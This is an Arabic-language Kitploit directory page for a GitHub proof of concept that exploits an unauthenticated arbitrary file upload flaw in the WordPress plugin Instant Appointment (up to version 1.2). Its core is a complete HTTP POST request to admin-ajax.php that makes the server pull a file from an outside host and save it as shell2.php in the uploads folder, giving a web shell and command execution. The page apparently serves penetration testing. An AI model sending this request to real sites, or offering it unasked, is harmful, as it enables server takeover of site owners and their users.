Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
instant-appointment-arbitrary-file-upload — instant-appointment - رفع ملف تعسفي | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/instant-appointment-arbitrary-file-upload
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubrandomrobbiebf/instant-appointment-arbitrary-file-upload

instant-appointment-arbitrary-file-upload

instant-appointment - رفع ملف تعسفي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

instant-appointment-arbitrary-file-upload

instant-appointment - رفع ملف تعسفي

الوصف

البرنامج الإضافي Instant Appointment لـ WordPress عرضة لثغرة رفع ملف تعسفي في الإصدارات حتى 1.2 وما يشملها. وهذا يتيح للمهاجمين غير المصادق عليهم رفع shell وتنفيذ الأوامر.

التفاصيل

  • النوع: إضافة
  • Slug: instant-appointment
  • الإصدار المتأثر: 1.2
  • درجة CVSS: 9.8
  • تصنيف CVSS: عالية
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:
  • الحالة: مغلق

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wp-dev.ddev.site
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 108

action=add_gallery_to_vendor&user_galerie[0][1]=https://rfi.nessus.org/rfi.txt&user_galerie[0][0]=shell2.php

سيكون الملف في uploads/2025/1/shell2.php.

تنزيل الأداة